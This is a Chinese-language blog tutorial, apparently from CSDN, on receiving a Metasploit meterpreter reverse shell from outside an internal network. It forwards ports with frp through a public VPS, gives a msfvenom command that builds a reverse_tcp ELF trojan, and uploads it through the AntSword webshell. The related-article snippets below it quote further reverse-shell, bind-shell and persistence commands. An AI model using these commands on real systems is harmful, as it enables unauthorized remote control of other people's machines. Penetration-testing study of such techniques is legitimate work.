内网的MSF接收反向shell

最新推荐文章于 2023-05-23 18:27:14 发布
最新推荐文章于 2023-05-23 18:27:14 发布
阅读量3k 收藏 7
点赞数 7
文章标签: linux 网络 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46736332/article/details/127517947
版权

关于处于内网环境的msf接收反向连接shell的教程。

内网渗透两位主流工具无非cs与msf,cobaltstrike与msf不一样,它的teamserver直接部署在外网ip上,做攻击使用连接方便,而msf没有。

  • 大家的MSF也几乎都是处于虚拟机中的内网环境,攻击的用处也大都是和cobaltstrike传递shell做后渗透。

  • 但是,当我们的主动攻击目标是外网机器,或者说是不同且不通的内网环境,这种情况,我们该如何去接收反向的shell连接呢。

    网上搜索关于msf教程,也通常都是在内网中做的演示 ,但是在渗透过程中不乏会遇到需要利用msf的exploit进行漏洞利用的过程,文章应运而生,文章创作目的意在帮助需要的小伙伴。

使用到的

  • frp
  • 公网vps
  • xshell
  • 蚁剑

一,frp的配置,使其可以互通

首先在内网kali和自己的vps上下载好frp,没钱买vps就去用提供端口转发的第三方服务,网上太多了。
在这里插入图片描述
简单配置一下
vps,frps配置
在这里插入图片描述
内网kali,frpc配置
在这里插入图片描述

连接vps的7000端口通信,并且把本地的2222端口映射到vps的8000端口
接下来测试一下连通性:

在这里插入图片描述
连通是成功的。
注意:如果遇到ping通可以,但是nc不能通信,大家可以多换一个端口尝试。

二,生成msf的木马

最简单的命令生成一个

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=外网IP LPORT=外网端口 -f elf > /test/shell.elf

留意这个监听payload:linux/x64/meterpreter/reverse_tcp
在这里插入图片描述
之后把shell.elf下载到本地,再通过蚁剑上传到目标机器
在这里插入图片描述

三,启动frp进行流量转发

在这里插入图片描述
四,开启msf的监听,等待上线
在这里插入图片描述
这个时候注意默认的payload,是跟我们生成木马时使用的不一样,原则上用什么监听模式生成木马,就用什么监听模式接受反弹shell,所以要改成一样的。
在这里插入图片描述
我们选择监听本地,之所以是2222端口,因为我们前面讲到转发的本地端口是2222
在这里插入图片描述

run在这里插入图片描述
目标机运行上传的shell.elf
在这里插入图片描述
成功接收到了shell
在这里插入图片描述

OK 结束

这是执行载荷去接收shell的案例,其实用执行命令反弹shell的话(比如ms17010),(不只是MSF)还有一些原理和实现方法是一样的,主要是端口转发。
另一方面,对一部分人来说,这种方法的作用某种情况下确确实实是多余的,可能是我的学习方式跟大家不大相同,刹那间的突发奇想,自己也就研究了一下,也是希望能帮助到想到这个问题的小伙伴。

  • 有问题随时私信。

end

Y7ii
关注
网络安全MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2912
内网渗透超级强悍
正向shell反弹shell
weixin_45936149的博客
03-26 9854
正向shell反弹shell的利用场景以及使用技巧
NC反弹Shell
qq_23066945的博客
11-23 656
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
msf反弹shell
weixin_34179762的博客
05-15 996
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
使用MSF反向反弹shell
weixin_45588247的博客
07-20 4775
实验准备: 攻击(攻击者)主机: kali 2020.2 虚拟机 nat 192.168.254.132 反向反弹: 【步骤一】:msfconsole启动,结果如【图1】所示: 【命令】 msfconsole 一、msfconsole(这种没有启用数据库,搜索某些东西会很慢) 二、数据...
云服务器msf跨域反弹shell
iuyoo的博客
03-29 6010
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
使用msf监听模块接收反弹shell
最新发布
-
05-23 2319
msf
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 7171
生成木马进行植入
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1089
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
内网转发——反弹shell
cxrpty的博客
03-16 1125
内网转发的目的: 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 代理方式: 正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务...
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell
不想当脚本小子的脚本小子
03-19 383
内网渗透中,正向 bind shell 会经常用到,正反向shell反向 reverse shell 就是通过我们监听,目标肉鸡运行 exe 我们就会收到一个反弹 shell;而正向就是目标肉鸡运行 exe,我们去连接肉鸡。 首先通过 MSF 生成一个正向 shellmsfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.84.128 -f exe > bind_shell.exe 使用pytho.
shell
m0_72675172的博客
08-08 100
欢迎大佬来滴滴
一对简单的 reverse shell / shell
cloudzk的博客
11-27 3836
一对入门级别的 reverse shell反弹shell)和 shell (控制端)。 1、reverse shell反弹端 client): 入侵者用于成功入侵后放置于受控PC上的反弹程序,相当于一个backdoor,reverse shell把受控PC的信息通过网络反弹至入侵者远程管理控制端。代码如下: #!/usr/bin/python import socket, subproces
冰蝎下的反弹shell连接msfconsole
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
kali监听win2008;反弹shellmsf生成木马;留后门;权限维持;
xiaochenhang的博客
08-30 1274
2、在win2008里面使用这条命令,将创建⼀个abc计划任务,每⼀分钟 执⾏⼀次abcd.exe;1、填写自己kali地址和要使用的端口号;生成abcd.exe木马;4、kali使用msfconsole工具进行渗透。注意abcd.exe路径;在计算机管理里面可以看见。...
msf生成的elf文件进行一次简单的逆向分析
热门推荐
Shanfenglan's blog
11-25 6万+
CATALOG1.前言2.需要的工具3.开始调试参考文章 1.前言 从没接触过这个技术点,今天刚好有机会接触,所以写一篇文章做个记录。 2.需要的工具 gdb 使用apt-get install gdb即可下载。 peda 为了弥补gdb不显示寄存器的缺陷所以要使用这个工具,在gdb安装好后执行下面的命令: git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py" >> ~/.gdbini
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 5900
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
msf基操shell(转)
qq_45290991的博客
07-16 824
实验准备: 攻击(攻击者)主机:          kali 2020.2  虚拟机        nat              ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值